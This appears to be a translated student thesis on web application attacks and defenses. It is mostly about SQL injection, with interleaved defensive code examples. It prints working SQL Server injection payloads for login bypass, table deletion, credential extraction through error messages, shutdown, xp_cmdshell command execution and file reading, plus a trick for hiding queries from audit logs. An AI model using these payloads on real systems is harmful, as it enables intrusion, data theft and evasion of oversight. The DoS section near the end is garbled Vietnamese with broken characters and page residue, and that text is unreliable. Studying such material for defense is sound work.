    3.2 Buffer Overflow

    A volume of data sent to the application exceeds the amount allocated, so the application cannot execute its intended next instruction and instead executes arbitrary code that the hacker has placed in the system. This is more serious if the application is configured to run as root on the system.

    3.3 URL Encoding

    Exploiting the standard encoding of special characters in URLs, the hacker encodes the disallowed characters (those that a script checks for) so that they slip past that check.

    3.4 Meta-characters

    Using special characters, the hacker can insert into the submitted data characters that form part of a command string, such as those used in XSS or -- in SQL, to get the command executed.

    3.5 Path Traversal

    A method that abuses the file path in a URL, which the server uses to return a file to the browser, so that the hacker can obtain the content of any file on the system.

    3.6 Injecting code that runs in the victim's browser (Cross-Site Scripting)

    This attack technique aims mainly at information on the user's computer rather than at the server. By adding an arbitrary piece of code (usually written in a scripting language such as JavaScript or VBScript), the hacker can steal important information such as cookies and, from that stolen information, become a legitimate user of the application. Cross-Site Scripting is also a form of session hijacking.

    3.7 OS Command Injection


    The ability to run system commands or code added to parameters that are not strictly checked, such as form parameters, cookies, HTTP request headers, and dangerous data in files uploaded to the server. Success with this technique lets the hacker run system commands with the same privileges as the server.

    3.8 Null Characters

    Character strings normally end with \0, and the hacker adds one to fool the application, because applications built with a compiler such as C++ treat \0 as the end of the string. Example:

    The hacker enters the following string: ti th nht\0 alert(document.cookie)

    If the application uses a C++ program to validate the string, the string above passes, because C++ takes \0 as the end of the string and does not check what follows it.

    3.9 SQL Injection

    In database programming, the programmer has failed to check the values entered, and the hacker exploits this by adding queries or invalid values in order to log in to the system easily.

    3.10 Server Side Includes

    The ability to add system-level directives such as file inclusion (include file) or database access (jdbc) gives the hacker a chance to reach files and databases that would normally not be viewable on the web site.

    3.11 Parameter manipulation

    Information exchanged between the server and the browser is stored in variables such as URL variables, hidden form fields and cookies. Because control over these variables has not been given enough attention, the hacker can alter their values to steal a user's session or change the price of an item.


    3.12 Denial of service (DoS)

    A large volume of requests is sent to the application within a fixed period of time, so the system cannot keep up with them and breaks down.

    B. Ways of carrying out web application attacks

    The previous part of this project gave an overview of the basic ways of attacking web applications. This part describes some of the basic and common attacks in more detail.

    1. Parameter manipulation

    Parameter manipulation is the technique of changing important information in cookies, the URL or hidden form fields. Cross-Site Scripting, Session ID, SQL Injection, Buffer Overflow and similar techniques also rely on these parameters to complete the hacker's attack steps. The parameters passed around can be said to be the starting point of everything a hacker does while attacking an application. That is why it is the first topic covered in this part, and it also serves as groundwork for the sections that follow.

    1.1 MANIPULATING THE URL

    1.1.1 Concept

    When an HTML form is submitted, the result is sent in one of two ways: GET or POST. With GET, all the variable names and their values appear in the URL string.

    1.1.2 Countermeasures

    To defend against modification of the URL string, the application can apply the following measure:

    The application uses a hash table. After the user authenticates successfully with a username, the application generates a corresponding key. This key is stored on the server together with the username in the hash-table object. Each time the user connects to the application, the key and username are sent along and compared with the key and username in the hash table. If they match the stored record, the request is valid; if not, the server knows that the user has changed the URL.

    In addition, valuable information should be encrypted before it is displayed in the browser, so that a hacker cannot modify it at will.

    1.2 MANIPULATING HIDDEN FORM FIELDS

    1.2.1 Concept

    Information can be passed through a hidden form variable, called a Hidden Form Field. A hidden field is not shown in the browser window, but the user can find its content with "view source"; this is a weakness the hacker exploits by saving the page from the browser, changing its content and submitting it to the server.

    Besides changing the content of hidden form fields, the hacker can also alter other parts of the form, such as the length of an input field, in order to carry out a BUFFER OVERFLOW attack.

    1.2.2 Some countermeasures

    Use hidden form fields only to display data in the browser; never use the value of such a field in the application's processing.

    Use the HTTP_REFERER variable to check where a request came from. However, the hacker can hide the real origin by using a proxy, so HTTP_REFERER should not be trusted too much as a check either.

    Concatenate the name and value of the hidden field into a single string. Use the MD5 algorithm or another one-way hash to digest that string, and store the digest in a hidden field called the "template string".

    When the form values are submitted, the same steps are repeated with the same key that we fixed beforehand. The result is then compared with the "template string"; if they do not match, the values in the form have been altered.


    Use a session ID that refers to information stored in the database.
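    The two server-side checks described in 1.1.2 and 1.2.2, as an added example that is not code from the thesis: a hash table of login keys compared on every request, and a keyed one-way hash over the hidden fields stored in an extra hidden field (the "template string" above) and recomputed on submit. HMAC-SHA256 with a server-side secret is used here in place of the MD5 the text names; all function names are ours and the secret is a constructed value.

```python
# Added example (not from the thesis): the two server-side checks described
# in 1.1.2 and 1.2.2. (1) After login the server stores a random key with the
# username in a hash table and compares both on every request. (2) The hidden
# fields of a form are covered by a keyed one-way hash kept in an extra hidden
# field (the text's "template string"), recomputed and compared on submit.
# HMAC-SHA256 with a server-side secret stands in for the MD5 the text names;
# all names are ours and the secret is a constructed value.
import hashlib
import hmac
import json
import secrets
from typing import Dict

# (1) hash table of login keys for URL parameters: username -> key
_login_keys: Dict[str, str] = {}


def issue_key(username: str) -> str:
    """Called once after a successful login; the key travels with the username."""
    key = secrets.token_hex(16)
    _login_keys[username] = key
    return key


def request_is_genuine(username: str, key: str) -> bool:
    """Every later request must carry the same (username, key) pair."""
    expected = _login_keys.get(username)
    # constant-time comparison: do not leak how many characters matched
    return expected is not None and hmac.compare_digest(expected, key)


# (2) template string over hidden form fields
SERVER_SECRET = b"constructed-secret-never-placed-in-html"


def template_string(fields: Dict[str, str]) -> str:
    """Serialise name/value pairs unambiguously (sorted JSON, so field order
    and '&' or '=' inside values cannot cause collisions) and MAC them."""
    joined = json.dumps(fields, sort_keys=True, separators=(",", ":"))
    return hmac.new(SERVER_SECRET, joined.encode("utf-8"), hashlib.sha256).hexdigest()


def render_form(fields: Dict[str, str]) -> Dict[str, str]:
    """What the server emits: the hidden fields plus the template field."""
    out = dict(fields)
    out["template"] = template_string(fields)
    return out


def form_untampered(submitted: Dict[str, str]) -> bool:
    """On submit, recompute over every field except the template and compare."""
    fields = dict(submitted)
    received = fields.pop("template", "")
    return hmac.compare_digest(received, template_string(fields))
```

    Because the key never leaves the server, a client that edits a hidden field (the price example from 3.11) cannot produce a matching template string, and a submission with the template field missing fails the same check.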

    2 SQL Injection attack techniques

    2.1 The simplest SQL injection technique

    Its purpose is to get past login forms.

    Example 1: suppose the web application contains the following code:

    SQLQuery = "SELECT tkUsername FROM User WHERE tkUsername='" & strUsername & "' AND Password='" & tkPassword & "'"
    flag = GetQueryResult(SQLQuery)
    if flag = "" then
        check = FALSE
    else
        check = TRUE
    end if

    The code above checks the Username and Password strings entered. If they exist in the User table then check=true, otherwise check=false.

    The values entered are:

    Username: ' OR ''='
    Password: ' OR ''='

    The SQL statement now reads:

    SELECT tkUsername FROM User WHERE tkUsername='' OR ''='' AND Password='' OR ''=''

    The comparison above is always true (because '' always equals ''), so the condition in the WHERE clause is always true. The username in the first row of the table is selected.


    Combined with SQL's special characters:

    the ; character marks the end of a query;
    the -- characters hide everything that follows them on the same line.

    Example 2:

    Username: '; drop table User--
    Password:

    The SQL statement now reads:

    SELECT tkUsername FROM User WHERE tkUsername=''; drop table User--' AND Password='" & tkPassword & "'

    With this statement the User table is deleted entirely.

    Example 3: another example that uses SQL's special characters to get into the system:

    Username: admin'--
    Password:

    The SQL statement reads:

    SELECT tkUsername FROM User WHERE tkUsername='admin'--' AND Password='" & tkPassword & "'

    This statement allows logging in to the system as admin without requiring a password.
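    The login check of Example 1 written twice, as an added example that is not code from the thesis: once by string concatenation exactly as the text's code does, and once with bound parameters, both against an in-memory SQLite table named like the text's User table. The inputs of Examples 1 and 3 pass the first version and fail the second, which is the whole of the fix for this class of bug. Table contents are constructed and function names are ours.

```python
# Added example (not from the thesis): the login check of Example 1 written
# twice against an in-memory SQLite table named like the text's User table,
# once by string concatenation (the text's code) and once with bound
# parameters. The inputs from Examples 1 and 3 pass the first version and
# fail the second. Table contents are constructed.
import sqlite3


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE User (tkUsername TEXT, Password TEXT)")
    con.executemany("INSERT INTO User VALUES (?, ?)",
                    [("admin", "passofAdmin"), ("nhimmap", "passofnhimmap")])
    return con


def login_concat(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable: the query text is assembled from the inputs, so a quote in
    the input ends the literal and the rest is parsed as SQL."""
    sql = ("SELECT tkUsername FROM User WHERE tkUsername='" + username
           + "' AND Password='" + password + "'")
    return con.execute(sql).fetchone() is not None


def login_param(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened: the query text is fixed; the inputs are bound as values and
    only ever compared, never parsed."""
    sql = "SELECT tkUsername FROM User WHERE tkUsername=? AND Password=?"
    return con.execute(sql, (username, password)).fetchone() is not None
```

    Note that the parameterised version also stops treating a legitimate quote (a name like O'Brien) as an error, which is the problem the text returns to in 2.7.2.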

    2.2. Attacks based on the SELECT statement


    Beyond the simple technique above, attacks usually rely on error messages to obtain information about tables and the fields in them. To do this one must understand the error messages and adjust the input accordingly.

    Direct injection is the case where the injected arguments are placed into the statement without sitting between single or double quotes. To neutralise the quotes and alter the statement while keeping its syntax valid, the injected string must begin with a single quote before the injected characters and the end of the statement must be left with a single quote, for example:

    StrSQL="SELECT tkUsername FROM User WHERE tkUsername='' and ''='"

    If doing this produces an error message that mentions a ( character, the injected string must contain a ):

    Example 4: suppose:

    StrSQL="SELECT tkUsername FROM User WHERE (tkUsername='" & tName & "')"

    Then the valid syntax is:

    StrSQL="SELECT tkUsername FROM User WHERE (tkUsername='') or ''='"

    The % character is also commonly used where information is searched for.

    Example 5: StrSQL="SELECT tkUsername FROM User WHERE tkUsername like '%" & tName & "'"

    2.3. Attacks based on the HAVING clause

    HAVING used together with GROUP BY is an effective way to obtain table and field information, and is discussed in more depth in part 4.

    2.4. Attacks based on the UNION operator

    The SELECT statement is used to retrieve information from the database. Usually the place where something can be injected into a SELECT statement is after WHERE. To return more rows from the table, the condition in the WHERE clause is changed by appending UNION SELECT.

    Example 6:

    StrSQL="SELECT tkUsername FROM User WHERE tkUsername like '%" & tName & "' UNION SELECT tkPassword from User"

    The statement above returns a result set that combines tkUsername with tkPassword from the User table.

    Note:

    The number of columns in the two SELECTs must match, that is, the original SELECT and the UNION SELECT appended to it must have the same number of columns and the same types. The syntax error returned after appending the UNION reveals the type of each field. Below are examples carried out without knowing the database contents, using HAVING, GROUP BY and UNION:

    Example 7: recall the query needed to log in:

    SQLQuery = "SELECT tkUsername,tkPassword FROM User WHERE tkUsername='" & strUsername & "' AND Password='" & tkPassword & "'"

    First, to learn the table name and field names the query uses, use a "having" condition, as in the following example. Value entered:

    Username: ' having 1=1--

    Error raised: [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'User.tkUsername' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

    From this error we learn that the table used in the query is User and that the table has a field named tkUsername.

    Next, use GROUP BY:

    Example 8

    Username: ' group by User.tkUsername having 1=1--


    Error raised:

    [Microsoft][ODBC SQL Server Driver][SQL Server] Column 'User.tkPassword' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

    So tkPassword is a field of the User table and is used in the query. Keep using GROUP BY until all the fields of the User table that take part in the query are known.

    When no more GROUP BY syntax errors are raised, move on to checking the type of each field in the table. Now UNION is used:

    Example 9:

    Username: ' union select sum(tkUsername) from User

    sum computes the total of the argument inside the parentheses, which must be numeric. If it is not numeric, the following error is raised:

    [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.

    With this error message, tkUsername must be of type varchar.

    With the method above, the type of every field in the table is easily determined. Having all of this information, the hacker can easily insert data of his own into the User table.

    Example 10

    Username: '; insert into User(tkUsername,tkPassword) values('admin', '')--

    The hacker who inserts this content, as in Example 6.III.4.2.4, now becomes the administrator without needing an authentication password.

    Example 11: illustrates a procedure that lets the hacker read all the information in the User table:

    Step 1: create a stored procedure that copies all the information in the two fields tkUsername and tkPassword of the User table into a single string in a new table foo with one field ret, using the following code:

    create proc test as
    begin
    declare @ret varchar(8000)
    set @ret=':'
    select @ret=@ret+' '+tkUsername+'/'+tkPassword from User
    select @ret as ret into foo
    end

    Run the statement by entering it in the form:

    Username: '; Create proc test as begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+tkUsername+'/'+tkPassword from User select @ret as ret into foo

    Step 2: call the stored procedure

    Having created the stored procedure above, make the call:

    Username: ';exec test

    Step 3: use UNION to view the content of table foo

    Username: '; select ret,1 from foo union select 1,1 from foo

    Error raised:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/passofAdmin nhimmap/passofnhimmap minhthu/passofminhthu' to a column of data type int.

    After these steps the hacker has obtained the content of the User table: the names in tkUsername and the passwords in tkPassword.

    Step 4: the hacker may also carefully delete table foo to cover his tracks:

    Username: '; drop table foo--

    Example 12: here is another way to determine the content of the User table, a search method that goes as follows:

    Step 1: walk the User table row by row

    Username: ' union select 1,1

    or:

    Username: ' union select min(tkUsername),1 from User where tkUsername > 'a'--

    Error raised:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' admin ' to a column of data type int.

    The first user in the User table is admin.

    Step 2: to learn the following values, enter:

    Username: ';select min(tkUsername),1 from User where tkUsername > 'admin' union select 1,1 from User

    Error raised:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax Error Converting the varchar value 'nhimmap' to a column of data type int.


    Step 3: repeat step 2 to obtain, one row at a time, the tkUsername field of the User table.

    Step 4: to learn tkPassword as well, proceed as follows:

    Username: ';select tkPassword,1 from User where tkUsername='admin' union select 1,1 from User

    Error raised:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error Converting the varchar value ' passOfAdmin ' to a column of data type int.

    To learn about the tables and columns in the database, the hidden system table INFORMATION_SCHEMA.TABLES can be queried.

    Example 13:

    select TABLE_NAME from INFORMATION_SCHEMA.TABLES

    INFORMATION_SCHEMA.TABLES holds information about every table on the server. The TABLE_NAME field holds the name of each table in the database.

    SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='User'

    The statement above is used to learn about the columns of a table. UNION can also be used to learn SQL Server's environment variables.

    Example 14: to find out which server the application is running on, proceed as follows:

    Username: ';select @@SERVERNAME union select 1

    Error raised:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' KHOAI_NGU ' to a column of data type int.

    2.5. Attacks based on the INSERT statement

    The INSERT keyword is used to put information into the database. INSERT statements are typically used for things like user registration information, guestbooks and so on.

    The ; and -- techniques are used as with SELECT; the number and types of the values entered must be right to avoid syntax errors (if the data type cannot be determined, all values can be entered as numbers).

    Example 15: SQLString = "INSERT INTO User VALUES ('" & strUsername & "', '" & strName & "', '" & strPassWord & "', '" & strLimitSize & "')"

    2.6 Attacks based on STORED PROCEDURES

    Stored procedures are used in web programming to reduce complexity in the application and to avoid SQL Injection attacks. However, the hacker can still exploit stored procedures to attack the system.

    Example 16: the stored procedure sp_login takes two parameters, username and password. If the following is entered:

    Username: nhimmap
    Password: ';shutdown--

    the stored procedure call becomes:

    exec sp_login 'nhimmap','';shutdown--'

    The shutdown command stops SQL Server immediately.

    2.7. Some additional attack techniques

    2.7.1 Strings without single quotes

    Developers can protect their applications by stripping all quotes, usually by replacing each single quote with two single quotes.

    Example 17

    Function escape(input)
        input = replace(input, "'", "''")
        escape = input
    End Function

    Clearly this blocks all of the attacks above. However, to produce a string value without using quotes, the char() function can be used, as in the following example:

    Example 18:

    INSERT into User VALUES(666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)

    Example 19 above, although it is a query without any single quotes, can still insert a string into the table, because it is equivalent to:

    INSERT into User VALUES(666,'chris','chris',255)

    The hacker can also choose a numeric username and password to avoid quotes, as in the following example:

    Example 20

    INSERT into User VALUES(667,123,123,0xffff)

    SQL Server automatically converts the number to a string.

    2.7.2 Second-order attacks

    Even though the application replaces single quotes, SQL code can still be injected.

    Example 21: register an account in the application, entering the username as follows:

    Username: admin'--
    Password: passofadmin


    The application replaces the quote, so the resulting INSERT is:

    INSERT into User VALUES(123, 'admin''--', 'password',0xffff)

    (but the database stores it as admin'-- )

    Suppose the application lets users change their password. The ASP code is written to make sure the user enters the old password correctly before entering the new one. The code is as follows:

    username = escape( Request.form("username") );
    oldpassword = escape( Request.form("oldpassword") );
    newpassword = escape( Request.form("newpassword") );
    var rso = Server.CreateObject("ADODB.Recordset");
    var sql = "select * from users where username = '" + username
        + "' and password = '" + oldpassword + "'";
    rso.open( sql, cn );
    if (rso.EOF)
    {
        // old password did not match; this branch is not shown in the original
    }

    The query that sets the new password is:

    sql = "update users set password = '" + newpassword +
        "' where username= '" + rso("username") + "'"

    rso("username") is the username value obtained from the login query, and it is admin'--

    The query now reads: update users set password = 'password' where username = 'admin'--'

    So the hacker can change the admin password to a value of his own. This case still exists in most large applications today that use a sanitising mechanism. The best remedy is to reject bad values rather than to fix them up. The problem is that some input fields (such as a name field) must allow these characters, for example O'Brien. The best way to handle this is to disallow single quotes; if that is not possible, then strip and replace as above. In that case, the best approach is to make sure that all data going into an SQL query (including values taken from the database) is strictly controlled.

    Some applications guard against users adding to the query by limiting the length of the input. With such a limit some attacks cannot be carried out, but there is still a gap for the hacker to exploit.

    Example 22: suppose both username and password are limited to at most 16 characters. Enter:

    Username: aaaaaaaaaaaaaaa'
    Password: '; shutdown--

    The application replaces the single quote with two single quotes, but because the string length is limited to 16 characters the quote that was just added is cut off. The SQL statement is:

    Select * from users where username='aaaaaaaaaaaaaaa'' and password='''; shutdown--'

    and as a result the username in the statement has the value:

    aaaaaaaaaaaaaaa' and password='
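    Both failure modes of quote-doubling described in 2.7.1 and 2.7.2 (the second-order injection of Example 21 and the truncation of Example 22), as an added example that is not code from the thesis. escape() is Example 17 in Python. Registration stores the attacker's username correctly; the change-password query is then built from the value read back out of the database without escaping, exactly as the ASP code above does, and the parameterised version that survives is shown beside it. The truncation is reproduced at the string level with a check that would catch it. It uses an in-memory SQLite table with constructed rows; all function names are ours.

```python
# Added example (not from the thesis): why quote-doubling on its own does not
# hold. escape() is the text's Example 17 in Python. Registration stores the
# attacker's name correctly, but the change-password query of 2.7.2 is built
# from the value read back out of the database without escaping, so the
# stored quote and "--" take effect there; the parameterised version is
# shown beside it. Example 22's truncation is reproduced at the string level.
# Uses an in-memory SQLite table with constructed rows; names are ours.
import sqlite3


def escape(value: str) -> str:
    return value.replace("'", "''")  # Example 17: one quote becomes two


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'passofAdmin')")
    return con


def register(con: sqlite3.Connection, username: str, password: str) -> None:
    # First-order escaping does its job here: the row stores admin'-- literally
    con.execute("INSERT INTO users VALUES ('%s', '%s')"
                % (escape(username), escape(password)))


def change_password_vuln(con, username, oldpassword, newpassword) -> bool:
    row = con.execute("SELECT username FROM users WHERE username='%s' AND password='%s'"
                      % (escape(username), escape(oldpassword))).fetchone()
    if row is None:
        return False
    # The text's rso("username") pattern: the value from the database is
    # trusted and concatenated unescaped, so admin'-- ends the literal and
    # comments out the closing quote; the UPDATE hits the real admin row.
    con.execute("UPDATE users SET password='%s' WHERE username='%s'"
                % (escape(newpassword), row[0]))
    return True


def change_password_safe(con, username, oldpassword, newpassword) -> bool:
    row = con.execute("SELECT username FROM users WHERE username=? AND password=?",
                      (username, oldpassword)).fetchone()
    if row is None:
        return False
    # Bound parameters: the stored value is compared as data wherever it came from
    con.execute("UPDATE users SET password=? WHERE username=?", (newpassword, row[0]))
    return True


def password_of(con, username: str) -> str:
    return con.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()[0]


def escape_then_truncate(value: str, limit: int) -> str:
    """Example 22's bug: escape first, enforce the length limit afterwards;
    the limit can cut off the second quote of a doubled pair."""
    return escape(value)[:limit]


def truncate_then_escape(value: str, limit: int) -> str:
    """Apply the limit to the raw input and escape afterwards, so a doubled
    quote is never split (rejecting over-long input is better still)."""
    return escape(value[:limit])


def quotes_balanced(literal_body: str) -> bool:
    """An escaped literal body must contain an even number of single quotes;
    an odd count means one of them will terminate the literal."""
    return literal_body.count("'") % 2 == 0
```

    The order of operations in the truncation case is the lesson: any length limit has to be applied to the raw input before escaping (or the over-long input rejected outright), and any value that reaches a query, whether from the request or from the database, has to be bound rather than concatenated.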

    2.7.3 Evading auditing:

    SQL Server has a tight auditing mechanism in the sp_traceXXX family of procedures, which lets many events occurring in the database be recorded. In particular the T-SQL events record every SQL statement executed on the server. If auditing is switched on, all of the hacker's SQL queries are recorded too, so an administrator can see what is going on and quickly find a remedy.

    But there is also a way around this: add the string sp_password to the T-SQL statement, because when this string is encountered the audit records the following instead:

    -- 'sp_password' was found in the text of this event.
    -- The text has been replaced with this comment for security reasons.

    even when sp_password appears inside a comment. So to hide every attack query, it is enough to append sp_password after the -- as follows:

    Username: admin'--sp_password

    2.7.4 Using the Extended Stored Procedures built into SQL Server

    If SQL Server is installed with the defaults, it runs as SYSTEM, the equivalent of full Windows access. master..xp_cmdshell can then be used to run commands remotely: '; exec master..xp_cmdshell 'ping 10.10.1.2'--

    Try double quotes (") if single quotes (') do not work.

    Below are some of the extended stored procedures hackers commonly use to run commands that reveal information on the victim machine:

    Xp_availablemedia: shows the drives currently on the machine
    Xp_dirtree: shows all directories, including subdirectories
    Xp_loginconfig: retrieves information about the server's security mode
    Xp_makecab: lets the user create archive files on the server (or of any file the server can access)

    2.7.5. Using self-made Extended Stored Procedures

    The Extended Stored Procedure API is a program whose simple job is to produce an extended stored procedure DLL containing malicious code. The DLL can be brought onto the server with commands, or with various automated transfer techniques such as an HTTP download or an FTP script.


    Once the DLL file exists on the server, the hacker can create an extended stored procedure with the following command:

    Example 19:

    sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'

    It can then be run like an ordinary extended stored procedure:

    exec xp_webserver

    When done, it can be removed with:

    sp_dropextendedproc 'xp_webserver'

    Xp_ntsec_enumdomains lists the domains the server can query.
    Xp_terminate_process terminates a process given its PID as parameter.

    2.7.6 Loading a text file into a table

    The bulk insert command loads data from a text file into a temporary table.

    Example 24 creates a simple table:

    create table foo (line varchar(8000))

    Then run bulk insert to copy the file's data into the table:

    Example 25:

    bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'

    The content of the process_login.asp page can then be retrieved with the techniques of Example 18.

    2.7.7 COUNTERMEASURES

    In most browsers, characters should be encoded in the URL before they are used.

    SQL Injection attacks rely on error messages, so the best defence is still not to show error messages to the user, replacing them with a page designed by the developer whenever an error occurs in the application.

    Check the values entered by users carefully, replacing characters such as ; ' and so on.

    Strip meta characters such as ' , " , / , \ , ; and extended characters such as NULL, CR, LF, ... from strings received from:

    - data submitted by the user
    - URL parameters
    - cookie values

    For numeric values, convert them to integer before running the SQL query, or use ISNUMERIC to make sure they are integers.

    Use an encryption algorithm for the data.
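    The checks listed in 2.7.7, together with the URL-encoding and null-character points from sections 3.3 and 3.8 of part A, applied to one request as an added example that is not code from the thesis. Input is percent-decoded before it is checked, NUL/CR/LF and the listed meta characters are rejected rather than silently stripped, numeric parameters are converted to int before they reach SQL, and database errors go to a server-side log while the client only sees the generic page the text recommends. Names are ours; the log is a plain list and the table is a constructed in-memory SQLite table so it runs offline.

```python
# Added example (not from the thesis): the checks listed in 2.7.7 applied to
# one request, together with the generic error page it recommends. Input is
# percent-decoded before it is checked (3.3); NUL, CR and LF are rejected
# (3.8 and the "extended characters" above); the listed meta characters are
# rejected rather than silently stripped; numeric parameters become int
# before reaching SQL; database errors are written to a server-side log and
# never echoed. Names are ours; the log is a plain list and the table is a
# constructed in-memory SQLite table so it runs offline.
import re
import sqlite3
from typing import Dict, List, Tuple
from urllib.parse import unquote

META_CHARS = set("'\"/\\;")             # the list given in 2.7.7
CONTROL_CHARS = {"\x00", "\r", "\n"}    # NULL, CR, LF


class BadInput(ValueError):
    pass


def clean_string(raw: str, max_len: int = 64) -> str:
    """Decode, then reject anything suspicious instead of trying to repair it."""
    value = unquote(raw)                 # %27 becomes ' before the checks run
    if len(value) > max_len:
        raise BadInput("too long")
    if any(ch in CONTROL_CHARS for ch in value):
        raise BadInput("control character")
    bad = sorted(set(value) & META_CHARS)
    if bad:
        raise BadInput(f"meta character {bad}")
    return value


def parse_int(raw: str) -> int:
    """Numeric parameters: accept only an integer literal, then convert."""
    value = unquote(raw).strip()
    if not re.fullmatch(r"-?\d{1,9}", value):
        raise BadInput("not an integer")
    return int(value)


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE User (id INTEGER, tkUsername TEXT)")
    con.executemany("INSERT INTO User VALUES (?, ?)", [(1, "admin"), (2, "nhimmap")])
    return con


def handle_lookup(con: sqlite3.Connection, params: Dict[str, str],
                  log: List[str]) -> Tuple[int, str]:
    """Returns (HTTP status, response body). Detail goes to the log only."""
    try:
        uid = parse_int(params.get("id", ""))
        name = clean_string(params.get("name", ""))
        row = con.execute("SELECT tkUsername FROM User WHERE id=? AND tkUsername=?",
                          (uid, name)).fetchone()
        return (200, row[0]) if row else (404, "Not found")
    except BadInput as exc:
        log.append(f"rejected input: {exc}")
        return (400, "Bad request")
    except sqlite3.Error as exc:
        # The page the developer designed, with no database detail in it
        log.append(f"database error: {exc}")
        return (500, "An error occurred. Please try again later.")
```

    The generic 500 page is what removes the signal that the HAVING, GROUP BY and UNION probes of 2.2 to 2.4 depend on; the ODBC error text still reaches the administrator through the log, where it belongs. Rejecting quotes outright does break names like O'Brien, which is the trade-off 2.7.2 discusses; the bound parameters in the query are what actually make the quote harmless.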

    3 Buffer overflow and denial-of-service attack techniques (Buffer overflow)

    This technique mainly exploits the user sending code larger than the memory the application initially allocated, putting the system into a memory-overflow state in which arbitrary code may even be inserted. If the application is configured to run as root, the attacker can act as the web server's system administrator. This is regarded as a classic attack. In this project I present one attack technique that causes buffer overflow and denial of service: DoS.

    3.1 Concept

    A DoS attack is one that paralyses network services so that they can no longer answer requests. This kind of attack affects many systems, is very easy to carry out, and is very hard to protect a system against. DoS attacks are usually based on protocols. For example, with ICMP the hacker can use an e-mail bomb to send thousands of e-mail messages in order to consume bandwidth and drain system resources on the mail server. Or software can be used to send a flood of requests to the server so that it cannot answer other, legitimate requests.

    3.2 What this kind of attack affects

    ATTACKS ON SWAP SPACE: most systems have a few hundred MB of swap space to serve requests from clients. Swap space is usually used for short-lived child processes, so a DoS can be based on filling up the swap space.

    ATTACKS ON BANDWIDTH: the bandwidth available to each system is limited, so if the hacker sends many requests to the system at the same time, the bandwidth cannot carry that large volume of data and the system breaks down.

    ATTACKS ON RAM: a DoS attack that takes up a large share of RAM can also cause problems that bring down the system. The Buffer Overflow attack is one example of this kind of damage.

    ATTACKS ON DISKS: a classic attack is to fill the hard disk. The disk can overflow and become unusable.

    3.3 Cc kiu tn cng DDos3.3.1 Kiu tn cng th 1Hacker hon ton c kh nng lm ngp h thng v bng thng ca hacker ln

    hn bng thng ca my ch. Kiu tn cng ny khng b hn ch bi tc truyn mng.v d: Hacker c mt ng truyn tc cao T1 ( 1.544- Mbps ) hayln hn c th d dng ph v mt h thng c ng truyn 56Kbps.

    3.3.2. Kiu tn cng th 2Kiu tn cng ny c s dng khi ng truyn mng ca hacker l qu thp

    so vi ng truyn ca my ch.Khng ging nh kiu tn cng DoS truyn thng ( phn 2 ), kiu tn cng vo

    bng thng ln hn s li dng nhng gi tin t nhng h thng khc nhau cng mtlc tin n h thng ch khin cho ng truyn ca h thng ch khng cn kh

    nng p ng, my ch khng cn kh nng nhn mt gi tin no na. Kiu tn cngny s loi my ch ra khi Internet.

    y l phng php tn cng kiu t chi dch v nhng khng l DoS m gil DDoS ( kiu t chi dch v phn tn ), ngha l cng mt lc nhiu my sc

    pht ng gi gi tin n my ch, lm cho my ch khng cn kh nng tipnhn gi tin v b loi khi mng Internet.

    Bng cch gi a ch IP ca my ch, hacker s cng lc gi nhiu gi tin

    SV :Nguyn Vn i 44

  • 8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744

    45/55

    n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun

    n cc h thng my mnh trn mng, cc h thng ny khi nhn gi tin SYN gi ny,chp nhn kt ni v gi tr mt gi tin SYN/ACK thng bo. V a ch IP ca gitin SYN b hacker sa i thnh a ch IP my ch nn nhng gi tin SYN/ACK sc gi v cho my ch. Cng mt lc nhn c nhiu gi tin, ng truyn camy ch khng kh nng p ng, h thng my ch t chi nhn bt k gi tin

    no v lc ny h thng my ch b sp .

    3.3.3. Kiu tn cng vo ti nguyn h thngy l kiu tn cng nhm vo ti nguyn h thng hn l ti nguyn mng nh

    CPU, b nh, file h thng, tin trnh..Hacker l mt ngi dng hp l ca hthng, v c mt lng ti nguyn gii hn trn h thng. Tuy nhin, hacker s lmdng quyn truy cp ny yu cu thm ti nguyn. Nh vy, h thng hay nhngngi dng hp l s b t chi s dng ti nguyn chia s.

    Kiu tn cng s khin cho h thng khng th s dng c v ti nguyn bs dng ht, khng cn tin trnh thc thi na

    3.4 Cch phng chng

Although a denial-of-service attack only knocks a system out for a few minutes, its consequences can be severe (in terms of both money and reputation). It is the technique hackers typically use when they cannot take administrative control of the system or its information, or when they want to damage an organization's reputation. On top of that, address spoofing makes it easy for the hacker to carry out the attack without fear of being detected.

Denial of service is the attack that is hardest to defend against and to investigate in order to find the perpetrator, because most hackers change the IP address of their own machine, so it is very difficult to determine who is responsible. To prevent bandwidth amplification, one should:

- Disable broadcast forwarding at the border router
- Increase the size of the connection queue

